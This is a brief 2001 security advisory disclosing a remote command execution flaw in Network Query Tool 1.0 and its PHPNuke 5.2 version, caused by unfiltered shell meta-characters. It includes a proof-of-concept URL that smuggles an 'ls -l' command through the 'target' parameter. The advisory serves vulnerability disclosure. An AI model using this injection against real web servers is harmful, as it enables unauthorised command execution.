--[ Network Query Tool 1.0 and Network Query Tool 1.0 Adapted for PHPNuke 5.2 remote command execution ]-- Problem discovered: 22/10/2001 by Cabezon Aurélien | aurelien.cabezon@iSecureLabs.com | http://www.isecurelabs.com/article.php?sid=147 --[ Description ]-- Network Query Tool 1.0 Adapted for PHPNuke 5.2 is a PHP script thtat allow user to: - Resolve/Reverse Lookup - Get DNS Records - Whois (Web) - Whois (IP owner) - Check port - Ping host - Traceroute to host Network Query tool does not check for special meta-characters like &;`'\"|*?~<>^()[]{}$\n\r. This allow any user to execute UNIX commands on web server. --[ Exploit ]-- Execute ls -al command. http://www.TEST.com/network_query.php?portNum=80&queryType=all&target=www.so meserver.com%3Bls+-l&Submit=Do+It --[ Fix ]-- Coders have been alerted --[ Informations about Network Query Tool ]-- Network Query Tool 1.0 http://www.shat.net/php/nqt/ Network Query Tool 1.0 Adapted for PHPNuke 5.2 http://http://www.yacapa.com --- Cabezon Aurélien http://www.iSecureLabs.com aurelien.cabezon@iSecureLabs.com
